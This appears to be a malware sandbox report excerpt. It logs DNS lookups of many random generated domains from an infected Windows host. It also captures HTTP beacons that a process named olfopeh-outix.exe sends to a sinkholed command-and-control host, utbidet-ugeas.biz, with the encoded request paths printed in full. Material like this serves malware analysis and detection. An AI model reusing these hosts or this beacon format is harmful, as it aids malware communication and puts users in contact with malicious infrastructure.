Dec 8, 2022 20:23:14.268511057 CET	8.8.8.8	192.168.2.4	0xb61e	Name error (3)	xwqkugqjrwceo.mp	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:14.593584061 CET	8.8.8.8	192.168.2.4	0xc36a	Name error (3)	eeakfwo.museum	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:14.623929024 CET	8.8.8.8	192.168.2.4	0xa2cd	Name error (3)	eeakfwo.museum	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:15.052407980 CET	8.8.8.8	192.168.2.4	0xfe3f	Name error (3)	qjqhgkwbwqcoi.mp	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:15.171895981 CET	8.8.8.8	192.168.2.4	0x86e0	Name error (3)	qjqhgkwbwqcoi.mp	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:15.582829952 CET	8.8.8.8	192.168.2.4	0x10c9	Name error (3)	opyceqenbqqs.mp	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:15.701092005 CET	8.8.8.8	192.168.2.4	0x74ce	Name error (3)	opyceqenbqqs.mp	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:16.033020020 CET	8.8.8.8	192.168.2.4	0xa5f8	No error (0)	sgscmskqmsvi.vg		88.198.29.97	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:16.158305883 CET	8.8.8.8	192.168.2.4	0x180d	No error (0)	utbidet-ugeas.biz		167.99.35.88	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:16.679037094 CET	8.8.8.8	192.168.2.4	0x68c4	Name error (3)	kocuxowua.mp	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:16.794826031 CET	8.8.8.8	192.168.2.4	0x2b3c	Name error (3)	kocuxowua.mp	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:17.165477991 CET	8.8.8.8	192.168.2.4	0xd26b	Name error (3)	emqhj.mp	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:17.283755064 CET	8.8.8.8	192.168.2.4	0xde1b	Name error (3)	emqhj.mp	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:17.647100925 CET	8.8.8.8	192.168.2.4	0x1772	Name error (3)	qvmyyuapkk.st	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:17.857057095 CET	8.8.8.8	192.168.2.4	0xdae4	Name error (3)	qvmyyuapkk.st	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:18.272787094 CET	8.8.8.8	192.168.2.4	0x52e2	Name error (3)	jymauen.mp	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:18.574768066 CET	8.8.8.8	192.168.2.4	0x57d	Name error (3)	jymauen.mp	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:18.904102087 CET	8.8.8.8	192.168.2.4	0x8714	Name error (3)	ujkceco.st	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:18.977298021 CET	8.8.8.8	192.168.2.4	0x55f6	Name error (3)	ujkceco.st	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:19.275717974 CET	8.8.8.8	192.168.2.4	0x5487	Name error (3)	uzugjmmhnwize.st	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:19.330987930 CET	8.8.8.8	192.168.2.4	0x96b7	Name error (3)	uzugjmmhnwize.st	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:19.657994032 CET	8.8.8.8	192.168.2.4	0xc521	Name error (3)	gkcobelirqy.st	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:19.714855909 CET	8.8.8.8	192.168.2.4	0xc6f7	Name error (3)	gkcobelirqy.st	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:20.007323980 CET	8.8.8.8	192.168.2.4	0x5ab	No error (0)	sugwqxczc.vg		88.198.29.97	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:20.102349997 CET	8.8.8.8	192.168.2.4	0x49f9	No error (0)	utbidet-ugeas.biz		167.99.35.88	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:20.501447916 CET	8.8.8.8	192.168.2.4	0x190	Name error (3)	zlrequk.nu	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:20.543554068 CET	8.8.8.8	192.168.2.4	0xbb7c	Name error (3)	zlrequk.nu	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:20.829435110 CET	8.8.8.8	192.168.2.4	0x296e	Name error (3)	wuibcee.nu	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:20.937597990 CET	8.8.8.8	192.168.2.4	0x36ce	Name error (3)	wuibcee.nu	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:21.291125059 CET	8.8.8.8	192.168.2.4	0x52bd	Name error (3)	wamejcdvbdiw.mp	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:21.407463074 CET	8.8.8.8	192.168.2.4	0x6ebf	Name error (3)	wamejcdvbdiw.mp	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:22.358675957 CET	8.8.8.8	192.168.2.4	0x5e9e	No error (0)	iydgligpetb.ws		64.70.19.203	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:25.365917921 CET	8.8.8.8	192.168.2.4	0x551d	No error (0)	utbidet-ugeas.biz		167.99.35.88	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:26.588774920 CET	8.8.8.8	192.168.2.4	0xcaca	Name error (3)	idusseszvtags.nu	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:26.620492935 CET	8.8.8.8	192.168.2.4	0x4969	Name error (3)	idusseszvtags.nu	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:26.859858036 CET	8.8.8.8	192.168.2.4	0x9070	No error (0)	wcqio.vg		88.198.29.97	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:26.998697996 CET	8.8.8.8	192.168.2.4	0x9522	No error (0)	utbidet-ugeas.biz		167.99.35.88	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:27.490719080 CET	8.8.8.8	192.168.2.4	0x6792	Name error (3)	yncfsmisaj.nu	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:27.570462942 CET	8.8.8.8	192.168.2.4	0x3901	Name error (3)	yncfsmisaj.nu	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:27.908138037 CET	8.8.8.8	192.168.2.4	0x22e1	Name error (3)	kmuusce.mp	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:28.021887064 CET	8.8.8.8	192.168.2.4	0x2756	Name error (3)	kmuusce.mp	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:28.438141108 CET	8.8.8.8	192.168.2.4	0xc222	Name error (3)	zwaxagmgxusaq.mp	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:28.559607983 CET	8.8.8.8	192.168.2.4	0x993a	Name error (3)	zwaxagmgxusaq.mp	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:29.003906965 CET	8.8.8.8	192.168.2.4	0x4cd0	Name error (3)	agfzxqquo.st	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:29.061101913 CET	8.8.8.8	192.168.2.4	0x64b0	Name error (3)	agfzxqquo.st	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:29.322973013 CET	8.8.8.8	192.168.2.4	0xc7c0	Name error (3)	tdkakey.st	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:29.352792025 CET	8.8.8.8	192.168.2.4	0x912b	Name error (3)	tdkakey.st	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:29.676044941 CET	8.8.8.8	192.168.2.4	0xf701	Name error (3)	nzuws.st	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:29.981837988 CET	8.8.8.8	192.168.2.4	0x2f4	Name error (3)	nzuws.st	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:30.587117910 CET	8.8.8.8	192.168.2.4	0x897f	Name error (3)	mwuuqawsyoa.tk	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:30.934410095 CET	8.8.8.8	192.168.2.4	0x6548	Name error (3)	mwuuqawsyoa.tk	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:31.230453968 CET	8.8.8.8	192.168.2.4	0x3cbd	Name error (3)	izwarlczd.museum	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:31.261770010 CET	8.8.8.8	192.168.2.4	0x26f9	Name error (3)	izwarlczd.museum	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:31.444320917 CET	8.8.8.8	192.168.2.4	0xb947	No error (0)	ctiowweyexi.ws		64.70.19.203	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:31.640234947 CET	8.8.8.8	192.168.2.4	0x43d1	No error (0)	utbidet-ugeas.biz		167.99.35.88	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:32.225161076 CET	8.8.8.8	192.168.2.4	0x5c46	Name error (3)	cavwousmoau.st	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:32.281140089 CET	8.8.8.8	192.168.2.4	0xc298	Name error (3)	cavwousmoau.st	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:33.177989006 CET	8.8.8.8	192.168.2.4	0x7292	Name error (3)	bjynqfygauaqu.tk	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:33.206829071 CET	8.8.8.8	192.168.2.4	0x6508	Name error (3)	bjynqfygauaqu.tk	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:33.727843046 CET	8.8.8.8	192.168.2.4	0x27ce	No error (0)	wbhotxso.ws		64.70.19.203	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:34.143244028 CET	8.8.8.8	192.168.2.4	0x3027	No error (0)	utbidet-ugeas.biz		167.99.35.88	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:34.783497095 CET	8.8.8.8	192.168.2.4	0x4f56	Name error (3)	aimgagne.mp	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:34.903600931 CET	8.8.8.8	192.168.2.4	0x89b2	Name error (3)	aimgagne.mp	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:35.372072935 CET	8.8.8.8	192.168.2.4	0xd472	Name error (3)	dcozymosctd.pw	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:35.403435946 CET	8.8.8.8	192.168.2.4	0xf2ea	Name error (3)	dcozymosctd.pw	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:35.845418930 CET	8.8.8.8	192.168.2.4	0x1808	Name error (3)	ujwcmmd.mp	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:35.998807907 CET	8.8.8.8	192.168.2.4	0xf1ae	Name error (3)	ujwcmmd.mp	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:36.494538069 CET	8.8.8.8	192.168.2.4	0x87a9	Name error (3)	jxqgjqq.st	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:36.537456036 CET	8.8.8.8	192.168.2.4	0xf561	Name error (3)	jxqgjqq.st	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:37.174977064 CET	8.8.8.8	192.168.2.4	0x5954	Name error (3)	cpidgyyodou.st	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:37.229016066 CET	8.8.8.8	192.168.2.4	0x1a6	Name error (3)	cpidgyyodou.st	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:37.640784979 CET	8.8.8.8	192.168.2.4	0x1daf	Name error (3)	cccyssksykq.museum	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:37.671802998 CET	8.8.8.8	192.168.2.4	0x6daf	Name error (3)	cccyssksykq.museum	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:38.012792110 CET	8.8.8.8	192.168.2.4	0xc911	Name error (3)	kawdmyymccbf.st	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:38.110490084 CET	8.8.8.8	192.168.2.4	0xb6f9	Name error (3)	kawdmyymccbf.st	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:38.433716059 CET	8.8.8.8	192.168.2.4	0x1e72	Name error (3)	jwujhuloicegg.pw	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:38.468406916 CET	8.8.8.8	192.168.2.4	0x8df0	Name error (3)	jwujhuloicegg.pw	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:38.838931084 CET	8.8.8.8	192.168.2.4	0x4bea	Name error (3)	eqhznmjkuzatqo.mp	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:38.957010031 CET	8.8.8.8	192.168.2.4	0x4e05	Name error (3)	eqhznmjkuzatqo.mp	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:39.295581102 CET	8.8.8.8	192.168.2.4	0x202b	No error (0)	lqsgfhgcg.ws		64.70.19.203	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:39.640944958 CET	8.8.8.8	192.168.2.4	0x534a	No error (0)	utbidet-ugeas.biz		167.99.35.88	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:40.174130917 CET	8.8.8.8	192.168.2.4	0x1d7e	Name error (3)	ordfyctqfzrtv.nu	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:40.238128901 CET	8.8.8.8	192.168.2.4	0xab95	Name error (3)	ordfyctqfzrtv.nu	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:40.672918081 CET	8.8.8.8	192.168.2.4	0x28d3	No error (0)	ssgqwyuy.ws		64.70.19.203	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:41.079787016 CET	8.8.8.8	192.168.2.4	0x280f	No error (0)	utbidet-ugeas.biz		167.99.35.88	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:41.542061090 CET	8.8.8.8	192.168.2.4	0x37f9	Name error (3)	axugskgmxksem.mp	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:42.134006023 CET	8.8.8.8	192.168.2.4	0x893d	Name error (3)	axugskgmxksem.mp	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:42.831939936 CET	8.8.8.8	192.168.2.4	0xc68f	Name error (3)	tdxqi.nu	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:42.878998995 CET	8.8.8.8	192.168.2.4	0xd5ed	Name error (3)	tdxqi.nu	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:46.794802904 CET	8.8.8.8	192.168.2.4	0xc0af	Name error (3)	ucingmv.st	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:46.850532055 CET	8.8.8.8	192.168.2.4	0x47f6	Name error (3)	ucingmv.st	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:48.415977955 CET	8.8.8.8	192.168.2.4	0x8fd6	Name error (3)	asxgzel.mp	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:48.542382956 CET	8.8.8.8	192.168.2.4	0xdf08	Name error (3)	asxgzel.mp	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:49.067137957 CET	8.8.8.8	192.168.2.4	0x50dc	Name error (3)	lgipm.mp	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:49.194035053 CET	8.8.8.8	192.168.2.4	0x4d04	Name error (3)	lgipm.mp	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:49.422574997 CET	8.8.8.8	192.168.2.4	0x9656	Name error (3)	tstwnth.museum	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:49.454703093 CET	8.8.8.8	192.168.2.4	0xad4f	Name error (3)	tstwnth.museum	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:49.758591890 CET	8.8.8.8	192.168.2.4	0x9439	Name error (3)	qvewy.nu	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:49.807312965 CET	8.8.8.8	192.168.2.4	0x8f6c	Name error (3)	qvewy.nu	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:50.237498999 CET	8.8.8.8	192.168.2.4	0xa35f	Name error (3)	nonemtugazb.mp	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:50.351779938 CET	8.8.8.8	192.168.2.4	0x3fbe	Name error (3)	nonemtugazb.mp	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:50.652503967 CET	8.8.8.8	192.168.2.4	0x6133	Name error (3)	mevqfyci.pw	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:50.684453964 CET	8.8.8.8	192.168.2.4	0x40fd	Name error (3)	mevqfyci.pw	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:51.116682053 CET	8.8.8.8	192.168.2.4	0x38e2	Name error (3)	iugrwzgnmcsehh.nu	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:51.153765917 CET	8.8.8.8	192.168.2.4	0x3efc	Name error (3)	iugrwzgnmcsehh.nu	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:51.439066887 CET	8.8.8.8	192.168.2.4	0x6d12	No error (0)	swsiysmmkqigg.ws		64.70.19.203	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:51.791817904 CET	8.8.8.8	192.168.2.4	0xed38	No error (0)	utbidet-ugeas.biz		167.99.35.88	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:52.217073917 CET	8.8.8.8	192.168.2.4	0x194a	Name error (3)	okszm.nu	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:52.272532940 CET	8.8.8.8	192.168.2.4	0x8021	Name error (3)	okszm.nu	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:52.647085905 CET	8.8.8.8	192.168.2.4	0x7f2b	Name error (3)	qepmedm.mp	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:52.676665068 CET	8.8.8.8	192.168.2.4	0x9eea	Name error (3)	qepmedm.mp	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:53.266002893 CET	8.8.8.8	192.168.2.4	0xa7b0	Name error (3)	csqrqoawfme.tk	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:53.603075981 CET	8.8.8.8	192.168.2.4	0x604c	Name error (3)	csqrqoawfme.tk	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:53.954695940 CET	8.8.8.8	192.168.2.4	0xae78	No error (0)	yyirivnncliy.ws		64.70.19.203	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:54.362138987 CET	8.8.8.8	192.168.2.4	0xed0e	No error (0)	utbidet-ugeas.biz		167.99.35.88	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:55.140357971 CET	8.8.8.8	192.168.2.4	0xc928	Name error (3)	ehuausdiet.mp	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:55.277750015 CET	8.8.8.8	192.168.2.4	0xb507	Name error (3)	ehuausdiet.mp	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:55.586730957 CET	8.8.8.8	192.168.2.4	0x62b	Name error (3)	demyp.nu	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:55.695458889 CET	8.8.8.8	192.168.2.4	0xcf8a	Name error (3)	demyp.nu	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:56.082597017 CET	8.8.8.8	192.168.2.4	0x1743	Name error (3)	wtrjyeues.mp	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:56.170016050 CET	8.8.8.8	192.168.2.4	0xb383	Name error (3)	wtrjyeues.mp	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:56.575448990 CET	8.8.8.8	192.168.2.4	0xec9e	Name error (3)	uiymgps.mp	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:56.879568100 CET	8.8.8.8	192.168.2.4	0x7afb	Name error (3)	uiymgps.mp	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:57.260199070 CET	8.8.8.8	192.168.2.4	0x1fb7	Name error (3)	icbmkx.st	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:57.366300106 CET	8.8.8.8	192.168.2.4	0x775d	Name error (3)	icbmkx.st	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:58.552095890 CET	8.8.8.8	192.168.2.4	0x6d7f	Name error (3)	gbtrsh.st	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:58.639503956 CET	8.8.8.8	192.168.2.4	0xd634	Name error (3)	gbtrsh.st	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:59.621299982 CET	8.8.8.8	192.168.2.4	0x74e4	Name error (3)	jyaxasrewrsmmu.st	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:59.675030947 CET	8.8.8.8	192.168.2.4	0xaec8	Name error (3)	jyaxasrewrsmmu.st	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:24:00.088666916 CET	8.8.8.8	192.168.2.4	0x4c3	Name error (3)	lpzegvpcu.nu	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:24:00.133816957 CET	8.8.8.8	192.168.2.4	0x4aca	Name error (3)	lpzegvpcu.nu	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:24:00.529131889 CET	8.8.8.8	192.168.2.4	0x257b	Name error (3)	mloaky.mp	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:24:00.746587992 CET	8.8.8.8	192.168.2.4	0x5f07	Name error (3)	mloaky.mp	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:24:01.226432085 CET	8.8.8.8	192.168.2.4	0x544	Name error (3)	mybuerovaln.pw	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:24:01.255567074 CET	8.8.8.8	192.168.2.4	0x52e	Name error (3)	mybuerovaln.pw	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:24:01.632036924 CET	8.8.8.8	192.168.2.4	0xf07e	Name error (3)	ssgykumyk.st	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:24:01.690710068 CET	8.8.8.8	192.168.2.4	0x914d	Name error (3)	ssgykumyk.st	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:24:02.237093925 CET	8.8.8.8	192.168.2.4	0x9325	No error (0)	gceqmqu.vg		88.198.29.97	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:24:02.786300898 CET	8.8.8.8	192.168.2.4	0xf666	No error (0)	utbidet-ugeas.biz		167.99.35.88	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:24:07.502298117 CET	8.8.8.8	192.168.2.4	0xcfb2	Name error (3)	trqmaudkiuqe.mp	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:24:07.533262014 CET	8.8.8.8	192.168.2.4	0x49ed	Name error (3)	trqmaudkiuqe.mp	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:24:07.713757038 CET	8.8.8.8	192.168.2.4	0x3881	No error (0)	wecfevuygxew.vg		88.198.29.97	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:24:07.862937927 CET	8.8.8.8	192.168.2.4	0x3872	No error (0)	utbidet-ugeas.biz		167.99.35.88	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:24:08.504266977 CET	8.8.8.8	192.168.2.4	0x73c	Name error (3)	iapwekmek.tk	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:24:08.844906092 CET	8.8.8.8	192.168.2.4	0x4c94	Name error (3)	iapwekmek.tk	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:24:09.178441048 CET	8.8.8.8	192.168.2.4	0x2e92	Name error (3)	iesgztkg.nu	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:24:09.252351046 CET	8.8.8.8	192.168.2.4	0x697f	Name error (3)	iesgztkg.nu	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:24:09.486393929 CET	8.8.8.8	192.168.2.4	0x99dd	Name error (3)	qlyiuhnqg.mp	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:24:09.602777958 CET	8.8.8.8	192.168.2.4	0x7f7e	Name error (3)	qlyiuhnqg.mp	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:24:09.787125111 CET	8.8.8.8	192.168.2.4	0x3b06	Name error (3)	lseeihdfamlcr.nu	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:24:09.830981970 CET	8.8.8.8	192.168.2.4	0xc16d	Name error (3)	lseeihdfamlcr.nu	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:24:10.041429043 CET	8.8.8.8	192.168.2.4	0x49fa	Name error (3)	kgwowukxuapio.nu	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:24:10.086266041 CET	8.8.8.8	192.168.2.4	0x1750	Name error (3)	kgwowukxuapio.nu	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:24:10.488830090 CET	8.8.8.8	192.168.2.4	0x17b0	No error (0)	mwnkma.vg		88.198.29.97	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:24:10.592319965 CET	8.8.8.8	192.168.2.4	0x3f85	No error (0)	utbidet-ugeas.biz		167.99.35.88	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:24:11.012785912 CET	8.8.8.8	192.168.2.4	0x3a4c	Name error (3)	gevwpaqsgqr.mp	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:24:11.128829956 CET	8.8.8.8	192.168.2.4	0x3604	Name error (3)	gevwpaqsgqr.mp	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:24:11.414315939 CET	8.8.8.8	192.168.2.4	0x2f8e	Name error (3)	gcwweypsyass.mp	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:24:11.536031961 CET	8.8.8.8	192.168.2.4	0x4ad3	Name error (3)	gcwweypsyass.mp	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

utbidet-ugeas.biz

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49696	167.99.35.88	80	C:\Windows\SysWOW64\olfopeh-outix.exe

Timestamp	kBytes transferred	Direction	Data
Dec 8, 2022 20:22:40.537974119 CET	97	OUT	GET /d/N?020A97C9E70A97C9E73B97E5E70A9755DF83B9807E0B97094F0893FFC938B9F0D53AA7E7E7 HTTP/1.0 Host: utbidet-ugeas.biz User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Dec 8, 2022 20:22:40.566513062 CET	98	IN	HTTP/1.1 204 No Content Server: nginx Date: Thu, 08 Dec 2022 19:22:40 GMT Connection: close X-Sinkhole: Malware

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49697	167.99.35.88	80	C:\Windows\SysWOW64\olfopeh-outix.exe

Timestamp	kBytes transferred	Direction	Data
Dec 8, 2022 20:22:40.646450043 CET	98	OUT	GET /d/N?020A97C9E70A97C9E73B97E5E70A9755DF83B9807E0B97094F0893FFC938B9F0D53AA7E7E7 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32) Host: utbidet-ugeas.biz Cache-Control: no-cache
Dec 8, 2022 20:22:40.675539017 CET	99	IN	HTTP/1.1 204 No Content Server: nginx Date: Thu, 08 Dec 2022 19:22:40 GMT Connection: keep-alive X-Sinkhole: Malware

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.4	49711	167.99.35.88	80	C:\Windows\SysWOW64\olfopeh-outix.exe

Timestamp	kBytes transferred	Direction	Data
Dec 8, 2022 20:23:00.984899998 CET	115	OUT	GET /d/N?027A3A75947A3A75944B3A59947A3AE9ACF3143C0D7B3AB53C783E43BA48144CA64A0A5B94 HTTP/1.0 Host: utbidet-ugeas.biz User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Dec 8, 2022 20:23:01.014173985 CET	115	IN	HTTP/1.1 204 No Content Server: nginx Date: Thu, 08 Dec 2022 19:23:00 GMT Connection: close X-Sinkhole: Malware

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.4	49712	167.99.35.88	80	C:\Windows\SysWOW64\olfopeh-outix.exe

Timestamp	kBytes transferred	Direction	Data
Dec 8, 2022 20:23:01.054065943 CET	116	OUT	GET /d/N?027A3A75947A3A75944B3A59947A3AE9ACF3143C0D7B3AB53C783E43BA48144CA64A0A5B94 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32) Host: utbidet-ugeas.biz Cache-Control: no-cache
Dec 8, 2022 20:23:01.084048986 CET	117	IN	HTTP/1.1 204 No Content Server: nginx Date: Thu, 08 Dec 2022 19:23:01 GMT Connection: keep-alive X-Sinkhole: Malware

